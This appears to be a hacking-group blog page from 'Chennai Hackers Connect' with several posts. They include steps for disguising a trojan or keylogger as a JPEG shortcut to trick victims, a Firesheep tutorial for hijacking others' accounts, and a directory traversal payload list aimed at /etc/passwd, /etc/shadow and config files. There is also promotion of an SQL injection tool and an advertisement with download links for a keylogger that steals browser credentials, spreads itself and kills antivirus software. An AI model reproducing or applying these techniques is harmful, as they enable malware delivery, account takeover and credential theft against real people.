Hide exe into Image

Hide exe Files into Image

This is a good trick to hide your exe files into a jpg file..!
How about sending a trojan or a keylogger into your victim using this trick..?  Here this Hiding exe in image id called Binding.

This can be done using software and also manully via Dos.So ,here we are going to do this using Dos.

Do the following steps as explained:

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it )

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :- 'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'  .Hope every CHC(Chennai Hackers Connect) member understanding it.

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :- %SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Read more

Pangolin Automated SQL injection

Automated SQL injection with pangolin- Tutorial+Application

Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.



Test many types of databases

Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.

Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.


DOWNLOAD TUTORIAL

Download here

Read more

Use internet without browser

Surf on the internet without Browser

Hello CHC(Chennai Hackers Members), now can surf on the internet without any actual browser. Have you ever been find yourself sitting in front of some computer where Internet Explorer or Firefox was blocked and restricted from installing any software? If that PC is running Windows XP,  then there is chance for you to still surf on the Internet. Just follow this:
Open Calculator, Start> Program Files> Accessories> Calculator, or press Windows+R and type ‘calc’ in the run box, click OK. In Calculator, go to Help> Help Topics.Right click on the left hand side of the title bar and click on ‘Jump to URL’. 
Type in the URL and make sure include the ‘http://’ at the beginning.

Basically what you are looking at is Internet Explorer 6 inside a help window, but this version of program isn’t quite smart. This was tested in Windows XP SP2 with Internet Explorer 6 and I’m not sure whether it will works in Internet Explorer 7 installed computer.

Feel free to comment 

Enjoy.

Read more

CRACK THE HASH CHALLENGE

FIND THE HASH AND CRACK

Hello CHC(Chennai Hacker Connect) members .As previous challenge was our first one ,we made it so simple and many of them cracked successfully.But this challenge gonna be a bit difficult than the previous one.


Top five crackers name and id will be displayed on CHC(Chennai Hacker Connect) FB page.


Note :Don't forget to comment answer with your FB id or mail id

CRACK THE HASH:

c132d0663ed992e42fa61328eac71aeef47330c0

Read more

HACK PASSWORD USING HTTP SESSION HIJACKING

HACK PASSWORD'S USING HTTP SESSION HIJACKING (Cookie Stealing)

Hi CHC(chennai hackers connect) members,sry for no posts for long time .We are quite busy with developing hacking tool. This method is a bit less known but in recent months it has become widely popular due to the introduction of the software 'FIRESHEEP'. When you log in to your account at a website, your web browser sends your username and password to the website server. The password is first encrypted and then send over the network. Then the server checks the username and password against the database and if they both match then sends to the user's browser a "cookie" (a text which the browser uses for further requests to the web server) but unlike the password the cookies are not encrypted and are sent as it is over the network, this cookies can be easily captured as they travel through the network or a busy WI-FI. The newly released Firefox extension "FIRESHEEP" makes it more easy. Actually so easy that even a total nube can capture this cookies. 

FIRESHEEP TUTORIAL (Http Session Hijacking)

Firesheep a Firefox addon has recently become very popular for easily carrying out a HTTP session hijacking attack. Http session hijacking attack can't be considered as a very sophisticated attack but needs some technical knowlegde to be performed . But Firesheep makes the attack a child's play. Firesheep was developed by Eric butler for Firefox, it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.
Now lets understand how Firesheep actually works. When you provide your username and password in login forms of different website and submit it, the browser first encrypts the password and then sends it over the network. The corresponding website compares the information against its internal database and if they match, it sends a cookie(a small text file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website every time the user opens a different page of the website. When the user logs out of his account the browser just deletes the cookie. Now the problem is that this cookies are not encrypted before sending over the network, due to this a hacker can capture this cookies and using them authenticate himself as the user from whom the cookie was stolen.
Now lets see how to use Firesheep.

Step 1) 

First download and install WinPcap (WinPcap in Windows is used for capturing network traffic.)
            You can use Pcap in libPcap library for unix like systems.
            DOWNLOAD WinPcap

Step 2) 

Download and open Firesheep in Firefox, it will automatically install it. Or just drag it and place it
             over Firefox shortcut (Firesheep at this instant is not supporting Firefox 4 ).
             DOWNLOAD Firesheep. 

Step 3) 

After it is installed, in Firefox go to View -->Sidebar --> Firesheep. A side bar will appear in the browser with a button "start capturing", press it and sit back. In few seconds you will see account details with photos of the target. Click on one of it and you will directly enter in his account. Simple as that.

(Note:- Using Firesheep to hijack others account is illegal under wiretapping Act.)

PERSONAL NOTE:- The addon Firesheep had become very popular recently so software Blacksheep was developed which stops Firesheep.

Read more

Directory Traversal Cheat Sheet

Cheat Sheet for Directory Traversal Attack

    ____ _                            _   _   _            _                 
   / ___| |__   ___ _ __  _ __   __ _(_) | | | | __ _  ___| | _____ _ __ ___ 
  | |   | '_ \ / _ \ '_ \| '_ \ / _` | | | |_| |/ _` |/ __| |/ / _ \ '__/ __|
  | |___| | | |  __/ | | | | | | (_| | | |  _  | (_| | (__|   <  __/ |  \__ \
   \____|_| |_|\___|_| |_|_| |_|\__,_|_| |_| |_|\__,_|\___|_|\_\___|_|  |___/

/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Read more

Backtrack kernel sources

Prepare Backtrack kernel sources

Some drivers and programs in Backtrack require kernel headers, like wireless drivers, Vmware tools for example.

CHC embers this is the easy way of compiling the Backtrack kernel:

root@bt:~# prepare-kernel sources

root@bt:~# cd /usr/src/linux

root@bt:~# cp -rf include/generated/* include/linux/

Read more

NetBIOS Scanning

Scanning NetBIOS using nbtscan and Metasploit

Hello CHC members ,During a penetration testing engagement we might come across with the NetBIOS service.In the past the NetBIOS protocol was enabled in almost every network that was running Windows.In nowadays system administrators are disabling this service due to the fact that plenty of information can be unveiled regarding shares,users and domain controllers.However NetBIOS can still be found on default configurations of Windows Server 2008 and Windows Vista so in a penetration testing this protocol can be abused if we discover it.

Generally the NetBIOS provides the following three services:

• Name Service: UDP/137
• Datagram Service: UDP/138
• Session Service: TCP/139

In systems that have this service enabled we can use some tools in order to discover information about the hostnames and domains especially in windows networks.In some cases this protocol can be found and in Linux systems.

The two basic tools are nbtstat and nbtscan.The nbtstat is a command line utility that is integrated in windows systems and it can unveil information about the netbios names and the remote machine name table or local but only for one host.From the other hand the nbtscan is a netbios nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one.

The next image is showing the usage of the nbtstat:

   nbtstat usage

The numeric values are called suffixes.For example the <01> and <1D> suffixes indicates the Master Browser,the <20> that the machine is running File Server service,the <03> that a messenger service is running and the <00> means that a workstation service is running as well.The <1E> is the Browser Service Elections.

The nbtscan is by default installed on backtrack but there is a version as well for windows platforms.We can use the nbtscan in order to scan the whole network.As we can see from the next image we have discovered the IP addresses,the NetBIOS names,the users that are logged in and the MAC addresses from the hosts that are running the NetBIOS service on the network.

   nbtscan

We can use also the -v option in order to produce a verbose output.

  nbtscan – verbose output

With the verbose option the output format is similar to the nbtstat.Again the <01> indicates the Master Browser service,the <00> the workstation,the <20> the File Server service and the <1e> and <1d> the Browser Service Elections and the Master Browser.Also we can see that the domain that this workstation belongs is London.

As an alternative option we can use the metasploit module smb_version which will unveil additional information like the operating system name and version,the service pack level,the language,the system and domain name.

Metasploit smb_version module

Conclusion

As we saw in this article from systems that had enabled the netbios service we have managed to discover plenty of information including the domain names,users,operating systems versions,MAC addresses and other.This service if found enabled can be used in the information gathering stage of a penetration test.So from the security point of view it is recommended this service to be disabled.

Read more

Unknow Keylogger v1.4 (Tool+Source Code)

  

Unknow Keylogger v1.4

Features:

1- Built in Stub 2- Get Tons of Information about the Victim (Computer User, Computer Name, Computer Total Physical Memory, Victim's IP Address, Victim's Country, Date, etc...) 3- Send logs to SMTP Severs and FTP 4- SMTP (Hotmail, Gmail, AOL, Yahoo) 5- Test Mail Functionality (Hotmail, Gmail, AOL, Yahoo) 6- Test FTP Functionality 7- Continuously Send Logs without Fail 8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you) 9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...)) 10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit) 11- Hide Functionality (Make the Server Invisible to the Naked eye) 12- Never Crashes in Victim's Computer (Will always be working whatever happens) 13- Simple and Easy to use GUI 14- Customer Server Name 15- Sends Clean and Very Organized Logs 16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes


Spreaders:
1- USB Spreader 2- LAN Spreader 3- P2P Spreader 4- RAR Spreader


Stealers:
1- Firefox 4/5/6/7/8/9 2- Google Chrome All Versions 3- Opera All Versions 4- Internet Explorer 7/9 5- Steam Stealer 6- CD Keys (up to 300)


Anti Killers:
1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlaram (All Versions)


Disablers:
1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore


Deleters:
1- Delete FireFox Cookies 2- Delete Google Chrome Cookies 3- Delete Internet Explorer Cookies


Download And Execute Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously 

Wpge Loader: Add any Link and it will be Automatically Loaded on the Victim's PC


Fake Message: Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the Victim's Computer


Built Ins 1- Icon Changer 2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)

DOWNLOAD Source Code 

DOWNLOAD Keylogger

Read more